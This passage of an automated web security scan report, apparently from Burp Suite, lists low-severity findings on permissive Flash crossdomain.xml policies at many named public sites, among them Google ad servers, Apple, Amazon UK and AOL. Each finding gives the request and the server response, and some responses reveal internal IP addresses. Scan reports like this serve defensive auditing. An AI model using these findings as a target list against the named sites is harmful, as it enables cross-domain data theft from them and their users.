<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
7.155. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 02 Apr 2011 11:34:36 GMT
Expires: Sun, 03 Apr 2011 11:34:36 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 4982
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
7.156. http://www.123greetings.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.123greetings.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.123greetings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:21 GMT
Expires: Sat, 02 Apr 2011 13:41:34 GMT
Last-Modified: Thu, 25 Jun 2009 06:57:01 GMT
Cache-Control: max-age=900
Content-Type: text/xml
ETag: "136-bb09a940"
Accept-Ranges: bytes
Server: Apache/2.2.3 (CentOS)
Content-Length: 310
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.123greetings.com" />
<allow-access-from domain="*.123g.us" />
<allow-access-from domain="192.168.0.61" />
...[SNIP]...
7.157. http://www.4shared.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: hostid=345229067; Expires=Tue, 30-Mar-2021 13:24:10 GMT; Path=/
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:24:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.4shared.com" />
<allow-access-from domain="*.4shared-china.com" />
<allow-access-from domain="*.4s.io" />
<allow-access-from domain="*.rumusic.org" />
<allow-access-from domain="*.19de9e7959fdb976322649b8.com" />
...[SNIP]...
7.158. http://www.4tubemate.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4tubemate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.4tubemate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:32 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 19:12:09 GMT
Accept-Ranges: bytes
Content-Length: 218
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.naiadsystems.com" />
</cros
...[SNIP]...
7.159. http://www.6pm.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.6pm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.6pm.com

Response

HTTP/1.0 200 OK
Server: nginx/0.9.4
Content-Type: application/xml
Last-Modified: Fri, 25 Mar 2011 20:56:09 GMT
Content-Length: 236
X-UUID: 61f40e6e-588e-11e0-82a7-001a645b7cf4
Date: Sat, 02 Apr 2011 14:06:07 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="overlay.tv" secure="false"/><allow-access-from domain="*.overlay.tv" secure="false"/><allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
7.160. http://www.acehardware.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:39 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 698
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:06:39 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="ace.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...
7.161. http://www.adobe.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Fri, 01 Apr 2011 12:39:00 GMT
Keep-Alive: timeout=5, max=492
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Sat, 02 Apr 2011 12:37:36 GMT
Age: 386
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...
7.162. http://www.ae.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ae.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ae.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 24 Feb 2010 11:38:20 GMT
ETag: "276-480571a624300"
Accept-Ranges: bytes
Content-Length: 630
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:31:35 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.ae.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aezone.com" to-ports="80,82" secure="false"/>
...[SNIP]...
<allow-access-from domain="testvipd5.scene7.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a248.e.akamai.net/a755bdded7308e72e7fac2eae90715fc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="10.96.103.13" to-ports="80,82" secure="false"/>
...[SNIP]...
<allow-access-from domain="10.100.108.20" to-ports="80,82" secure="false"/>
...[SNIP]...
7.163. http://www.aeropostale.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aeropostale.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aeropostale.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:09 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 22 Jul 2010 08:45:04 GMT
ETag: "4fc0bd-233-48bf5ef3f6400"
Accept-Ranges: bytes
Content-Length: 563
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:39:09 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.aeropostale.com" />
<allow-access-from domain="aero.imageg.net" />
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.ps4u.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="63.240.110.143" />
<allow-access-from domain="206.16.220.143" />
<allow-access-from domain="172.20.1.143" />
<allow-access-from domain="172.21.1.143" />
...[SNIP]...
7.164. http://www.allbusiness.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allbusiness.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:41 GMT
Server: Apache
Last-Modified: Fri, 01 Oct 2010 01:06:57 GMT
ETag: "82"
Accept-Ranges: bytes
Content-Length: 130
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
       <allow-access-from domain="*.brightcove.com" secure="false"/>
</cross-domain-policy>
7.165. http://www.allposters.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.allposters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allposters.com

Response

HTTP/1.0 200 OK
Cteonnt-Length: 590
Content-Type: text/xml
Last-Modified: Thu, 26 Feb 2009 18:46:14 GMT
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Date: Sat, 02 Apr 2011 13:31:48 GMT
Content-Length: 590
Connection: close
Set-Cookie: TLTSID=CF9AA2DC4CDDAE840BA64199B51669BA; domain=.allposters.com; path=/
Set-Cookie: TLTUID=CF9AA2DC4CDDAE840BA64199B51669BA; domain=.allposters.com; path=/; expires=Sat, 02-04-2021 13:31:49 GMT
Set-Cookie: NSC_xxx_bqd=ffffffff098a1cdc45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 13:33:48 GMT;path=/;httponly

...<?xml version="1.0"? encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-doma
...[SNIP]...
<allow-access-from domain="*.allposters.com"/>
   <allow-access-from domain="*.allposters.co.uk"/>
   <allow-access-from domain="*.art.com"/>
   <allow-access-from domain="*.art.co.uk"/>
...[SNIP]...
7.166. http://www.allrecipes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.allrecipes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allrecipes.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 218
Content-Type: text/xml
Last-Modified: Thu, 18 Jan 2007 23:00:58 GMT
Accept-Ranges: bytes
ETag: "6af14e84543bc71:1386"
Server: Microsoft-IIS/6.0
X-Powered-By: WEB205
Date: Sat, 02 Apr 2011 13:25:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.allrecipes.com" />
</cr
...[SNIP]...
7.167. http://www.altavista.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.altavista.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.altavista.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:54 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
7.168. http://www.amazon.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.amazon.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.amazon.co.uk

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:07 GMT
Server: Server
Last-Modified: Tue, 09 Nov 2010 18:03:08 GMT
ETag: "3e0-8d97ef00"
Accept-Ranges: bytes
Content-Length: 992
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.amazon.com" />
<allow
...[SNIP]...
<allow-access-from domain="anon.amazon.speedera.net" />
<allow-access-from domain="*.images-amazon.com" />
<allow-access-from domain="*.ssl-images-amazon.com" />
<allow-access-from domain="*.amazon.ca" />
<allow-access-from domain="*.amazon.cn" />
<allow-access-from domain="*.amazon.de" />
<allow-access-from domain="*.amazon.fr" />
<allow-access-from domain="*.amazon.it" />
<allow-access-from domain="*.amazon.jp" />
<allow-access-from domain="*.amazon.co.jp" />
<allow-access-from domain="*.amazon.uk" />
<allow-access-from domain="*.amazon.co.uk" />
...[SNIP]...
7.169. http://www.americangreetings.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.americangreetings.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.americangreetings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:50 GMT
Server: Apache
Last-Modified: Mon, 17 May 2010 17:14:32 GMT
ETag: "849ae-19f-5bb74e00"
Accept-Ranges: bytes
Content-Length: 415
Content-Type: text/xml
Vary: Accept-Encoding
Connection: close
Set-Cookie: lbsegment=95;path=/;domain=.americangreetings.com;

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.beta.americangreetings.com" />
<allow-access-from domain="*.americangreetings.com" />
<allow-access-from domain="*.imgag.com" secure="false" />
...[SNIP]...
7.170. http://www.aolnews.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolnews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:20 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 2128
Keep-Alive: timeout=5, max=999945
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.digitas.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.publishing.aol.com" />

<allow-access-from domain="*.rewind.com" />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.tmz.com" />
<allow-access-from domain="*.unicast.com" />
<allow-access-from domain="*.video.aol.com" />
<allow-access-from domain="*.video.office.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" />

<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="publishing.aol.com" />
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="tmz.warnerbros.com" />
...[SNIP]...
7.171. http://www.apple.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.14 (Unix)
X-N: S
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=313
Expires: Sat, 02 Apr 2011 12:48:03 GMT
Date: Sat, 02 Apr 2011 12:42:50 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>
7.172. http://www.associatedcontent.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.associatedcontent.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.associatedcontent.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:13 GMT
